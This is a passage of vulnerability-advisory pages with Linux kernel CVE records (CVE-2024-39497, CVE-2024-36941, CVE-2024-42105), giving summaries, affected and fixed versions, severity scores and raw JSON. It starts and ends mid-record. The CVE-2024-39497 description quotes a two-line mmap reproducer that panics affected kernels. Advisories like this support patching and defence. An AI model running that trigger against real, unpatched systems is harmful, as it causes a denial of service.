Unaffected: 5.10.229 , ≤ 5.10.* (semver)
Unaffected: 5.15.169 , ≤ 5.15.* (semver)
Unaffected: 6.1.114 , ≤ 6.1.* (semver)
Unaffected: 6.6.35 , ≤ 6.6.* (semver)
Unaffected: 6.9.6 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:15.676Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b4a8b89bf6787090b56424d269bf84ba00c3263"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03c71c42809ef4b17f5d874cdb2d3bf40e847b86"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/39bc27bd688066a63e56f7f64ad34fae03fbe3b8"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39497",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:23.056270Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:40.913Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_gem_shmem_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a508a102edf8735adc9bb73d37dd13c38d1a1b10",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            },
            {
              "lessThan": "3ae63a8c1685e16958560ec08d30defdc5b9cca0",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            },
            {
              "lessThan": "2219e5f97244b79c276751a1167615b9714db1b0",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            },
            {
              "lessThan": "1b4a8b89bf6787090b56424d269bf84ba00c3263",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            },
            {
              "lessThan": "03c71c42809ef4b17f5d874cdb2d3bf40e847b86",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            },
            {
              "lessThan": "39bc27bd688066a63e56f7f64ad34fae03fbe3b8",
              "status": "affected",
              "version": "2194a63a818db71065ebe09c8104f5f021ca4e7b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_gem_shmem_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.2"
            },
            {
              "lessThan": "5.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.229",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.169",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.114",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.35",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.229",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.169",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.114",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.35",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.6",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/shmem-helper: Fix BUG_ON() on mmap(PROT_WRITE, MAP_PRIVATE)\n\nLack of check for copy-on-write (COW) mapping in drm_gem_shmem_mmap\nallows users to call mmap with PROT_WRITE and MAP_PRIVATE flag\ncausing a kernel panic due to BUG_ON in vmf_insert_pfn_prot:\nBUG_ON((vma-\u003evm_flags \u0026 VM_PFNMAP) \u0026\u0026 is_cow_mapping(vma-\u003evm_flags));\n\nReturn -EINVAL early if COW mapping is detected.\n\nThis bug affects all drm drivers using default shmem helpers.\nIt can be reproduced by this simple example:\nvoid *ptr = mmap(0, size, PROT_WRITE, MAP_PRIVATE, fd, mmap_offset);\nptr[0] = 0;"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:17:04.655Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a508a102edf8735adc9bb73d37dd13c38d1a1b10"
        },
        {
          "url": "https://git.kernel.org/stable/c/3ae63a8c1685e16958560ec08d30defdc5b9cca0"
        },
        {
          "url": "https://git.kernel.org/stable/c/2219e5f97244b79c276751a1167615b9714db1b0"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b4a8b89bf6787090b56424d269bf84ba00c3263"
        },
        {
          "url": "https://git.kernel.org/stable/c/03c71c42809ef4b17f5d874cdb2d3bf40e847b86"
        },
        {
          "url": "https://git.kernel.org/stable/c/39bc27bd688066a63e56f7f64ad34fae03fbe3b8"
        }
      ],
      "title": "drm/shmem-helper: Fix BUG_ON() on mmap(PROT_WRITE, MAP_PRIVATE)",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39497",
    "datePublished": "2024-07-12T12:20:32.330Z",
    "dateReserved": "2024-06-25T14:23:23.751Z",
    "dateUpdated": "2025-11-03T21:56:15.676Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-36941 (GCVE-0-2024-36941)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:29 – Updated: 2025-05-20 14:17

Title

wifi: nl80211: don't free NULL coalescing rule

Summary

In the Linux kernel, the following vulnerability has been resolved: wifi: nl80211: don't free NULL coalescing rule If the parsing fails, we can dereference a NULL pointer here.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/327382dc0f16b2689…
	https://git.kernel.org/stable/c/97792d0611ae2e6fe…
	https://git.kernel.org/stable/c/5a730a161ac2290d4…
	https://git.kernel.org/stable/c/ad12c74e953b68ad8…
	https://git.kernel.org/stable/c/b0db4caa10f2e4e81…
	https://git.kernel.org/stable/c/244822c09b4f9aedf…
	https://git.kernel.org/stable/c/f92772a642485394d…
	https://git.kernel.org/stable/c/801ea33ae82d6a9d9…

Impacted products

Vendor

Product

Version

Linux

Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < 327382dc0f16b268950b96e0052595efd80f7b0a (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < 97792d0611ae2e6fe3ccefb0a94a1d802317c457 (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < 5a730a161ac2290d46d49be76b2b1aee8d2eb307 (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < ad12c74e953b68ad85c78adc6408ed8435c64af4 (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < b0db4caa10f2e4e811cf88744fbf0d074b67ec1f (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < 244822c09b4f9aedfb5977f03c0deeb39da8ec7d (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < f92772a642485394db5c9a17bd0ee73fc6902383 (git)
Affected: be29b99a9b51b0338eea3c66a58de53bbd01de24 , < 801ea33ae82d6a9d954074fbcf8ea9d18f1543a7 (git)

Linux

Affected: 3.12
Unaffected: 0 , < 3.12 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36941",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-03T18:57:12.725668Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-20T14:17:10.233Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.555Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/327382dc0f16b268950b96e0052595efd80f7b0a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/97792d0611ae2e6fe3ccefb0a94a1d802317c457"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a730a161ac2290d46d49be76b2b1aee8d2eb307"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ad12c74e953b68ad85c78adc6408ed8435c64af4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b0db4caa10f2e4e811cf88744fbf0d074b67ec1f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/244822c09b4f9aedfb5977f03c0deeb39da8ec7d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f92772a642485394db5c9a17bd0ee73fc6902383"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/801ea33ae82d6a9d954074fbcf8ea9d18f1543a7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/nl80211.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "327382dc0f16b268950b96e0052595efd80f7b0a",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "97792d0611ae2e6fe3ccefb0a94a1d802317c457",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "5a730a161ac2290d46d49be76b2b1aee8d2eb307",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "ad12c74e953b68ad85c78adc6408ed8435c64af4",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "b0db4caa10f2e4e811cf88744fbf0d074b67ec1f",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "244822c09b4f9aedfb5977f03c0deeb39da8ec7d",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "f92772a642485394db5c9a17bd0ee73fc6902383",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            },
            {
              "lessThan": "801ea33ae82d6a9d954074fbcf8ea9d18f1543a7",
              "status": "affected",
              "version": "be29b99a9b51b0338eea3c66a58de53bbd01de24",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/wireless/nl80211.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.12"
            },
            {
              "lessThan": "3.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: nl80211: don\u0027t free NULL coalescing rule\n\nIf the parsing fails, we can dereference a NULL pointer here."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:12:31.170Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/327382dc0f16b268950b96e0052595efd80f7b0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/97792d0611ae2e6fe3ccefb0a94a1d802317c457"
        },
        {
          "url": "https://git.kernel.org/stable/c/5a730a161ac2290d46d49be76b2b1aee8d2eb307"
        },
        {
          "url": "https://git.kernel.org/stable/c/ad12c74e953b68ad85c78adc6408ed8435c64af4"
        },
        {
          "url": "https://git.kernel.org/stable/c/b0db4caa10f2e4e811cf88744fbf0d074b67ec1f"
        },
        {
          "url": "https://git.kernel.org/stable/c/244822c09b4f9aedfb5977f03c0deeb39da8ec7d"
        },
        {
          "url": "https://git.kernel.org/stable/c/f92772a642485394db5c9a17bd0ee73fc6902383"
        },
        {
          "url": "https://git.kernel.org/stable/c/801ea33ae82d6a9d954074fbcf8ea9d18f1543a7"
        }
      ],
      "title": "wifi: nl80211: don\u0027t free NULL coalescing rule",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36941",
    "datePublished": "2024-05-30T15:29:28.687Z",
    "dateReserved": "2024-05-30T15:25:07.072Z",
    "dateUpdated": "2025-05-20T14:17:10.233Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-42105 (GCVE-0-2024-42105)

Vulnerability from cvelistv5 – Published: 2024-07-30 07:46 – Updated: 2026-01-05 10:51

Title

nilfs2: fix inode number range checks

Summary

In the Linux kernel, the following vulnerability has been resolved: nilfs2: fix inode number range checks Patch series "nilfs2: fix potential issues related to reserved inodes". This series fixes one use-after-free issue reported by syzbot, caused by nilfs2's internal inode being exposed in the namespace on a corrupted filesystem, and a couple of flaws that cause problems if the starting number of non-reserved inodes written in the on-disk super block is intentionally (or corruptly) changed from its default value. This patch (of 3): In the current implementation of nilfs2, "nilfs->ns_first_ino", which gives the first non-reserved inode number, is read from the superblock, but its lower limit is not checked. As a result, if a number that overlaps with the inode number range of reserved inodes such as the root directory or metadata files is set in the super block parameter, the inode number test macros (NILFS_MDT_INODE and NILFS_VALID_INODE) will not function properly. In addition, these test macros use left bit-shift calculations using with the inode number as the shift count via the BIT macro, but the result of a shift calculation that exceeds the bit width of an integer is undefined in the C specification, so if "ns_first_ino" is set to a large value other than the default value NILFS_USER_INO (=11), the macros may potentially malfunction depending on the environment. Fix these issues by checking the lower bound of "nilfs->ns_first_ino" and by preventing bit shifts equal to or greater than the NILFS_USER_INO constant in the inode number test macros. Also, change the type of "ns_first_ino" from signed integer to unsigned integer to avoid the need for type casting in comparisons such as the lower bound check introduced this time.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/57235c3c88bb43004…
	https://git.kernel.org/stable/c/08cab183a624ba716…
	https://git.kernel.org/stable/c/731011ac6c37cbe97…
	https://git.kernel.org/stable/c/3be4dcc8d7bea52ea…
	https://git.kernel.org/stable/c/fae1959d6ab2c5267…
	https://git.kernel.org/stable/c/9194f8ca57527958b…
	https://git.kernel.org/stable/c/1c91058425a01131e…
	https://git.kernel.org/stable/c/e2fec219a36e09936…

Impacted products

Vendor

Product

Version

Linux

Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 57235c3c88bb430043728d0d02f44a4efe386476 (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 08cab183a624ba71603f3754643ae11cab34dbc4 (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 731011ac6c37cbe97ece229fc6daa486276052c5 (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 3be4dcc8d7bea52ea41f87aa4bbf959efe7a5987 (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < fae1959d6ab2c52677b113935e36ab4e25df37ea (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 9194f8ca57527958bee207919458e372d638d783 (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < 1c91058425a01131ea30dda6cf43c67b17884d6a (git)
Affected: 8a9d2191e9f43bbcd256a9a6871bd73434c83f2f , < e2fec219a36e0993642844be0f345513507031f4 (git)

Linux

Affected: 2.6.30
Unaffected: 0 , < 2.6.30 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:01:41.084Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/57235c3c88bb430043728d0d02f44a4efe386476"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/08cab183a624ba71603f3754643ae11cab34dbc4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/731011ac6c37cbe97ece229fc6daa486276052c5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3be4dcc8d7bea52ea41f87aa4bbf959efe7a5987"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fae1959d6ab2c52677b113935e36ab4e25df37ea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9194f8ca57527958bee207919458e372d638d783"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1c91058425a01131ea30dda6cf43c67b17884d6a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e2fec219a36e0993642844be0f345513507031f4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-42105",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:17:49.299547Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:32:45.818Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/nilfs.h",
            "fs/nilfs2/the_nilfs.c",
            "fs/nilfs2/the_nilfs.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "57235c3c88bb430043728d0d02f44a4efe386476",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "08cab183a624ba71603f3754643ae11cab34dbc4",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "731011ac6c37cbe97ece229fc6daa486276052c5",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "3be4dcc8d7bea52ea41f87aa4bbf959efe7a5987",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "fae1959d6ab2c52677b113935e36ab4e25df37ea",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "9194f8ca57527958bee207919458e372d638d783",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "1c91058425a01131ea30dda6cf43c67b17884d6a",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            },
            {
              "lessThan": "e2fec219a36e0993642844be0f345513507031f4",
              "status": "affected",
              "version": "8a9d2191e9f43bbcd256a9a6871bd73434c83f2f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nilfs2/nilfs.h",
            "fs/nilfs2/the_nilfs.c",
            "fs/nilfs2/the_nilfs.h"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.30"
            },
            {
              "lessThan": "2.6.30",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "2.6.30",
                  "vulnerable": true
